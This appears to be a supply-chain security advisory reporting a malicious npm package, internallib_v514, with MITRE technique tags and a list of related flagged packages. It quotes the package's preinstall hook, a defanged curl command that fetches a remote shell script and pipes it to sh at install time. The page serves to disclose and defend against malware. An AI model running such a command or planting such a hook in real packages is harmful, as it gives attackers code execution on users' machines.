internallib_v514@1.0.1
Malicious code in internallib_v514 (npm)
T1059.007 · JavaScriptT1105 · Ingress Tool TransferT1071 · Application Layer Protocol
Analysis
The package's preinstall hook runs `/usr/bin/curl hxxp://10[.]0[.]70[.]90/rev[.]sh | sh`, fetching and executing a remote shell script from the private IP 10[.]0[.]70[.]90 at install time. The package is otherwise an empty stub with no functional code, so installing it executes the remote payload.
- analyzed by
- Leitwacht
- first seen
- Aug 7, 2026, 12:11 AM
- analyzed
- Aug 7, 2026, 12:12 AM
Related advisories
- streak-map-cache@1.0.0
- streak-cache-map@1.0.0
- dolyame-boxy-mobile-bnpl-card-panel@35.3.4
- dolyame-boxy-desktop-bnpl-picture-gallery@35.6.3
- dolyame-boxy-mobile-bnpl-card-gallery@35.9.5
- devplatform-supafetch@35.2.1
- devplatform-utils@35.5.2
- bnpl-blocks-atom-bnpl-skeleton@35.6.3
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.